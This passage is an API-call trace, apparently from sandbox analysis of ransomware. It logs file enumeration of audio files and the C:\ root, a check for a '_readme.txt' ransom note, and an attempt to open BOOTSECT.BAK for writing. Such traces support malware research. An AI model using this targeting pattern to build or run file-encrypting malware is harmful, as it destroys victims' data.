ftLastAccessTime.dwHighDateTime=0x1d5b9d9, ftLastWriteTime.dwLowDateTime=0xb786e350, ftLastWriteTime.dwHighDateTime=0x1d5b9d9, nFileSizeHigh=0x0, nFileSizeLow=0x6c1b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3nhftNJqbGrzTJO.m4a", cAlternateFileName="3NHFTN~1.M4A")) returned 1 [0094.326] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27b54300, ftCreationTime.dwHighDateTime=0x1d5c3c2, ftLastAccessTime.dwLowDateTime=0xa0ab60a0, ftLastAccessTime.dwHighDateTime=0x1d5c12e, ftLastWriteTime.dwLowDateTime=0xa0ab60a0, ftLastWriteTime.dwHighDateTime=0x1d5c12e, nFileSizeHigh=0x0, nFileSizeLow=0x9d66, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4q5bCCZXK.m4a", cAlternateFileName="4Q5BCC~1.M4A")) returned 1 [0094.326] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa63d4310, ftCreationTime.dwHighDateTime=0x1d5b843, ftLastAccessTime.dwLowDateTime=0xd4f87b30, ftLastAccessTime.dwHighDateTime=0x1d5ba72, ftLastWriteTime.dwLowDateTime=0xd4f87b30, ftLastWriteTime.dwHighDateTime=0x1d5ba72, nFileSizeHigh=0x0, nFileSizeLow=0x5e32, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7d54.wav", cAlternateFileName="")) returned 1 [0094.326] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8db202f0, ftCreationTime.dwHighDateTime=0x1d5bbc6, ftLastAccessTime.dwLowDateTime=0x7d5ab20, ftLastAccessTime.dwHighDateTime=0x1d5c1e6, ftLastWriteTime.dwLowDateTime=0x7d5ab20, ftLastWriteTime.dwHighDateTime=0x1d5c1e6, nFileSizeHigh=0x0, nFileSizeLow=0x13125, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8yEpsB_ctagmhD.m4a", cAlternateFileName="8YEPSB~1.M4A")) returned 1 [0094.326] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9da9780, ftCreationTime.dwHighDateTime=0x1d5beb9, ftLastAccessTime.dwLowDateTime=0x1c6a48e0, ftLastAccessTime.dwHighDateTime=0x1d5c446, ftLastWriteTime.dwLowDateTime=0x1c6a48e0, ftLastWriteTime.dwHighDateTime=0x1d5c446, nFileSizeHigh=0x0, nFileSizeLow=0x74ab, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="aboV04qPctQvBmOw.wav", cAlternateFileName="ABOV04~1.WAV")) returned 1 [0094.326] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfcb0dd0, ftCreationTime.dwHighDateTime=0x1d5c387, ftLastAccessTime.dwLowDateTime=0x7d117730, ftLastAccessTime.dwHighDateTime=0x1d5be52, ftLastWriteTime.dwLowDateTime=0x7d117730, ftLastWriteTime.dwHighDateTime=0x1d5be52, nFileSizeHigh=0x0, nFileSizeLow=0xb243, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bg-t2NyhqrG.m4a", cAlternateFileName="BG-T2N~1.M4A")) returned 1 [0094.326] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea6ff3d0, ftCreationTime.dwHighDateTime=0x1d5b92d, ftLastAccessTime.dwLowDateTime=0xe79f0b40, ftLastAccessTime.dwHighDateTime=0x1d5b695, ftLastWriteTime.dwLowDateTime=0xe79f0b40, ftLastWriteTime.dwHighDateTime=0x1d5b695, nFileSizeHigh=0x0, nFileSizeLow=0xfb77, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eS_6wkd7jpEVWnFA.mp3", cAlternateFileName="ES_6WK~1.MP3")) returned 1 [0094.327] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe9b77c70, ftCreationTime.dwHighDateTime=0x1d5be13, ftLastAccessTime.dwLowDateTime=0x5ee66190, ftLastAccessTime.dwHighDateTime=0x1d5bc80, ftLastWriteTime.dwLowDateTime=0x5ee66190, ftLastWriteTime.dwHighDateTime=0x1d5bc80, nFileSizeHigh=0x0, nFileSizeLow=0x1e44, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="G4Lm5aAbySbM65.wav", cAlternateFileName="G4LM5A~1.WAV")) returned 1 [0094.327] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70e575a0, ftCreationTime.dwHighDateTime=0x1d5ba25, ftLastAccessTime.dwLowDateTime=0xe71a5e10, ftLastAccessTime.dwHighDateTime=0x1d5b85a, ftLastWriteTime.dwLowDateTime=0xe71a5e10, ftLastWriteTime.dwHighDateTime=0x1d5b85a, nFileSizeHigh=0x0, nFileSizeLow=0x4a36, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="giiOzOC5.m4a", cAlternateFileName="")) returned 1 [0094.327] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x44365ad0, ftCreationTime.dwHighDateTime=0x1d5bcd0, ftLastAccessTime.dwLowDateTime=0x3d085c80, ftLastAccessTime.dwHighDateTime=0x1d5bed4, ftLastWriteTime.dwLowDateTime=0x3d085c80, ftLastWriteTime.dwHighDateTime=0x1d5bed4, nFileSizeHigh=0x0, nFileSizeLow=0x15e1f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GpA7mMv_Y7MLF.wav", cAlternateFileName="GPA7MM~1.WAV")) returned 1 [0094.327] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14893d90, ftCreationTime.dwHighDateTime=0x1d5bbde, ftLastAccessTime.dwLowDateTime=0x4efe4a70, ftLastAccessTime.dwHighDateTime=0x1d5c5dd, ftLastWriteTime.dwLowDateTime=0x4efe4a70, ftLastWriteTime.dwHighDateTime=0x1d5c5dd, nFileSizeHigh=0x0, nFileSizeLow=0x22ec, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GqSa4959nQ.wav", cAlternateFileName="GQSA49~1.WAV")) returned 1 [0094.327] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c143f20, ftCreationTime.dwHighDateTime=0x1d5b69c, ftLastAccessTime.dwLowDateTime=0x29ffdb60, ftLastAccessTime.dwHighDateTime=0x1d5ba63, ftLastWriteTime.dwLowDateTime=0x29ffdb60, ftLastWriteTime.dwHighDateTime=0x1d5ba63, nFileSizeHigh=0x0, nFileSizeLow=0x9cf3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IdIYrU.mp3", cAlternateFileName="")) returned 1 [0094.327] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b006300, ftCreationTime.dwHighDateTime=0x1d5c1b1, ftLastAccessTime.dwLowDateTime=0x7cc75ec0, ftLastAccessTime.dwHighDateTime=0x1d5c0d7, ftLastWriteTime.dwLowDateTime=0x7cc75ec0, ftLastWriteTime.dwHighDateTime=0x1d5c0d7, nFileSizeHigh=0x0, nFileSizeLow=0x142ce, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="KsrG7yUjFxpiHomzmLY.wav", cAlternateFileName="KSRG7Y~1.WAV")) returned 1 [0094.327] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdb9cb870, ftCreationTime.dwHighDateTime=0x1d5b860, ftLastAccessTime.dwLowDateTime=0xc77b5600, ftLastAccessTime.dwHighDateTime=0x1d5bb7e, ftLastWriteTime.dwLowDateTime=0xc77b5600, ftLastWriteTime.dwHighDateTime=0x1d5bb7e, nFileSizeHigh=0x0, nFileSizeLow=0x164e0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RS5nuZPZGC1TJ-JFEy2.m4a", cAlternateFileName="RS5NUZ~1.M4A")) returned 1 [0094.327] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5d920e0, ftCreationTime.dwHighDateTime=0x1d5b8f6, ftLastAccessTime.dwLowDateTime=0x267640, ftLastAccessTime.dwHighDateTime=0x1d5c176, ftLastWriteTime.dwLowDateTime=0x267640, ftLastWriteTime.dwHighDateTime=0x1d5c176, nFileSizeHigh=0x0, nFileSizeLow=0x13d95, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="un-3o_bmUF5.mp3", cAlternateFileName="UN-3O_~1.MP3")) returned 1 [0094.327] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ae851e0, ftCreationTime.dwHighDateTime=0x1d5c24c, ftLastAccessTime.dwLowDateTime=0x29956840, ftLastAccessTime.dwHighDateTime=0x1d5b88b, ftLastWriteTime.dwLowDateTime=0x29956840, ftLastWriteTime.dwHighDateTime=0x1d5b88b, nFileSizeHigh=0x0, nFileSizeLow=0x30ff, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZC2SdManmWp88_k0.mp3", cAlternateFileName="ZC2SDM~1.MP3")) returned 1 [0094.327] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ae851e0, ftCreationTime.dwHighDateTime=0x1d5c24c, ftLastAccessTime.dwLowDateTime=0x29956840, ftLastAccessTime.dwHighDateTime=0x1d5b88b, ftLastWriteTime.dwLowDateTime=0x29956840, ftLastWriteTime.dwHighDateTime=0x1d5b88b, nFileSizeHigh=0x0, nFileSizeLow=0x30ff, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZC2SdManmWp88_k0.mp3", cAlternateFileName="ZC2SDM~1.MP3")) returned 0 [0094.327] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0094.327] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0094.327] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0094.327] PathFindFileNameW (pszPath="") returned="" [0094.327] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0094.328] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0094.328] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x800) returned 0x32faf28 [0094.328] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x32faf28 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0094.328] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x9b79750 [0094.328] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330810 [0094.329] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.329] FreeLibrary (hLibModule=0x75670000) returned 1 [0094.329] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330810 | out: hHeap=0x630000) returned 1 [0094.329] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32faf28 | out: hHeap=0x630000) returned 1 [0094.329] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x806) returned 0x9b79750 [0094.329] PathAppendW (in: pszPath="C:\\", pMore="_readme.txt" | out: pszPath="C:\\_readme.txt") returned 1 [0094.329] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x9b78ec8 [0094.329] PathFileExistsW (pszPath="C:\\_readme.txt") returned 1 [0094.329] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0094.329] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x670618 [0094.329] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330810 [0094.329] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33172f8 [0094.329] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330810 | out: hHeap=0x630000) returned 1 [0094.329] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3316f08 [0094.329] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1c) returned 0x3330810 [0094.329] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3316db8 [0094.329] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316f08 | out: hHeap=0x630000) returned 1 [0094.330] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33172f8 | out: hHeap=0x630000) returned 1 [0094.330] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa17023e0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa17023e0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0094.330] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330220 [0094.330] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33308b0 [0094.330] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x38) returned 0x3331b88 [0094.330] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33172f8 [0094.330] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0094.330] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330810 | out: hHeap=0x630000) returned 1 [0094.330] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330810 [0094.330] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33308b0 | out: hHeap=0x630000) returned 1 [0094.330] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330220 | out: hHeap=0x630000) returned 1 [0094.330] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x84a3bb2c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5db2a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0094.330] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330220 [0094.330] PathFindExtensionW (pszPath="C:\\bootmgr") returned="" [0094.330] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330220 | out: hHeap=0x630000) returned 1 [0094.330] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac54a060, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac54a060, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac54a060, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0094.330] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330220 [0094.330] PathFindExtensionW (pszPath="C:\\BOOTSECT.BAK") returned=".BAK" [0094.330] CreateFileW (lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0094.331] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330220 | out: hHeap=0x630000) returned 1 [0094.331] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xa174e6a0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa174e6a0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Config.Msi", cAlternateFileName="")) returned 1 [0094.331] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330220 [0094.331] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33308b0 [0094.331] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x54) returned 0x3338dc8 [0094.331] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3316db8 [0094.332] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33301d0 [0094.332] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33172f8 | out: hHeap=0x630000) returned 1 [0094.332] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330810 | out: hHeap=0x630000) returned 1 [0094.332] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3331b88 | out: hHeap=0x630000) returned 1 [0094.332] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330810 [0094.332] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33308b0 | out: hHeap=0x630000) returned 1 [0094.332] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330220 | out: hHeap=0x630000) returned 1 [0094.332] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0094.332] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fba0 [0094.332] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe70 [0094.332] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x332dab0 [0094.332] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33172f8 [0094.332] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330220 [0094.332] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33308b0 [0094.332] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0094.332] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33301d0 | out: hHeap=0x630000) returned 1 [0094.332] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330810 | out: hHeap=0x630000) returned 1 [0094.332] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338dc8 | out: hHeap=0x630000) returned 1 [0094.332] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe28 [0094.332] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe70 | out: hHeap=0x630000) returned 1 [0094.332] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fba0 | out: hHeap=0x630000) returned 1 [0094.332] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x56257dc0, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x56257dc0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0x4e9ad440, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0094.333] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330810 [0094.333] PathFindExtensionW (pszPath="C:\\hiberfil.sys") returned=".sys" [0094.333] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330810 | out: hHeap=0x630000) returned 1 [0094.333] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSOCache", cAlternateFileName="")) returned 1 [0094.333] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330810 [0094.333] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33301d0 [0094.333] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa8) returned 0x32b2de0 [0094.333] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3316db8 [0094.333] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fe60 [0094.333] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330040 [0094.333] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fba0 [0094.333] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33172f8 | out: hHeap=0x630000) returned 1 [0094.333] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330220 | out: hHeap=0x630000) returned 1 [0094.333] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33308b0 | out: hHeap=0x630000) returned 1 [0094.333] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fe28 | out: hHeap=0x630000) returned 1 [0094.333] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332dab0 | out: hHeap=0x630000) returned 1 [0094.333] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33308b0 [0094.333] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33301d0 | out: hHeap=0x630000) returned 1 [0094.333] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330810 | out: hHeap=0x630000) returned 1 [0094.333] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x563d4b80, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x563d4b80, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0x4ecf3280, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x7ff7c000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0094.333] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330810 [0094.333] PathFindExtensionW (pszPath="C:\\pagefile.sys") returned=".sys" [0094.334] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330810 | out: hHeap=0x630000) returned 1 [0094.334] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0094.334] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330810 [0094.334] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33301d0 [0094.334] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330220 [0094.334] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33301d0 | out: hHeap=0x630000) returned 1 [0094.334] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330810 | out: hHeap=0x630000) returned 1 [0094.334] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xaa0e5bd0, ftLastAccessTime.dwHighDateTime=0x1d5c60a, ftLastWriteTime.dwLowDateTime=0xaa0e5bd0, ftLastWriteTime.dwHighDateTime=0x1d5c60a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0094.334] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33172f8 [0094.334] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3316f08 [0094.334] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xfc) returned 0x32b14c8 [0094.334] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0094.334] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330810 [0094.334] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33301d0 [0094.334] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fe28 [0094.334] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) 